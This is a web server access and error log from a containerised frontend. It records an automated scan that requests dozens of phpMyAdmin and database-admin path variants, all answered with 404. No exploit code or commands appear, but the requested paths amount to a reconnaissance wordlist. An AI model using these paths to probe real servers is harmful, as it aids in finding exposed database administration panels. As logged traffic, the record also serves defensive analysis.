frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:34 +0000] "GET /PMA2020/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *166 open() "/frontend/app/dbadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /dbadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /dbadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *167 open() "/frontend/app/phpMyAdmin4/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /phpMyAdmin4/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *168 open() "/frontend/app/PMA2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /PMA2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *169 open() "/frontend/app/mysql/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /mysql/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *170 open() "/frontend/app/db/webdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/webdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /db/webdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *171 open() "/frontend/app/shopdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /shopdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *172 open() "/frontend/app/sql/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *173 open() "/frontend/app/2phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /2phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /2phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:35 [error] 20#20: *174 open() "/frontend/app/administrator/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:35 +0000] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *175 open() "/frontend/app/pma2018/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2018/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /pma2018/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *176 open() "/frontend/app/pma2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /pma2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *177 open() "/frontend/app/_phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *178 open() "/frontend/app/php-myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /php-myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /php-myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *179 open() "/frontend/app/sql/php-myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *180 open() "/frontend/app/mysql/sqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /mysql/sqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *181 open() "/frontend/app/phpMyAdmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /phpMyAdmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *182 open() "/frontend/app/shopdb/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /shopdb/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /shopdb/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:36 [error] 20#20: *183 open() "/frontend/app/db/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:36 +0000] "GET /db/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *184 open() "/frontend/app/mysql/dbadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /mysql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *185 open() "/frontend/app/mysql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /_phpmyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *186 open() "/frontend/app/_phpmyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /_phpmyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *187 open() "/frontend/app/PMA2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /PMA2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *188 open() "/frontend/app/pma2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /pma2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *189 open() "/frontend/app/administrator/db/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/db/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /administrator/db/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /phpmyadmin_/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *190 open() "/frontend/app/phpmyadmin_/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin_/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *191 open() "/frontend/app/admin/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /admin/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /admin/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *192 open() "/frontend/app/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:37 [error] 20#20: *193 open() "/frontend/app/pma2013/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2013/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:37 +0000] "GET /pma2013/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *194 open() "/frontend/app/phpmyadmin2017/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /phpmyadmin2017/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *195 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /pma2019/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *196 open() "/frontend/app/pma2019/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2019/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *197 open() "/frontend/app/phpmyadmin2015/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /phpmyadmin2015/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /sql/websql/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *198 open() "/frontend/app/sql/websql/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/websql/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *199 open() "/frontend/app/mysql/dbadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /mysql/dbadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *200 open() "/frontend/app/phpmyadmin2021/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /phpmyadmin2021/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *201 open() "/frontend/app/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:38 [error] 20#20: *202 open() "/frontend/app/pma2012/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /pma2012/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:38 +0000] "GET /pma2012/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *203 open() "/frontend/app/administrator/phpMyAdmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /administrator/phpMyAdmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *204 open() "/frontend/app/sql/php-myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/php-myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /administrator/PMA/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *205 open() "/frontend/app/administrator/PMA/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/PMA/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *206 open() "/frontend/app/phpmyadmin2014/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2014/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *207 open() "/frontend/app/sql/sqladmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /sql/sqladmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /sql/sqladmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *208 open() "/frontend/app/mysql/web/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql/web/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /mysql/web/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /db/myadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *209 open() "/frontend/app/db/myadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /db/myadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *210 open() "/frontend/app/mysql-admin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysql-admin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /mysql-admin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *211 open() "/frontend/app/database/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /database/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /database/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:39 [error] 20#20: *212 open() "/frontend/app/PMA2016/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2016/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:39 +0000] "GET /PMA2016/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *213 open() "/frontend/app/program/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /program/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /program/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *214 open() "/frontend/app/mysqlmanager/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /mysqlmanager/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /mysqlmanager/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /administrator/pma/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *215 open() "/frontend/app/administrator/pma/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /administrator/pma/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *216 open() "/frontend/app/phpMyadmin/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpMyadmin/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /phpMyadmin/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *217 open() "/frontend/app/phpmyadmin2/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /phpmyadmin2/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 172.18.0.1 - - [06/May/2021:08:06:40 +0000] "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1" 404 548 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36" "-"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *218 open() "/frontend/app/phpmyadmin2011/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /phpmyadmin2011/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
frontend_1  | 2021/05/06 08:06:40 [error] 20#20: *219 open() "/frontend/app/PMA2017/index.php" failed (2: No such file or directory), client: 172.18.0.1, server: localhost, request: "GET /PMA2017/index.php?lang=en HTTP/1.1", host: "140.112.230.89"
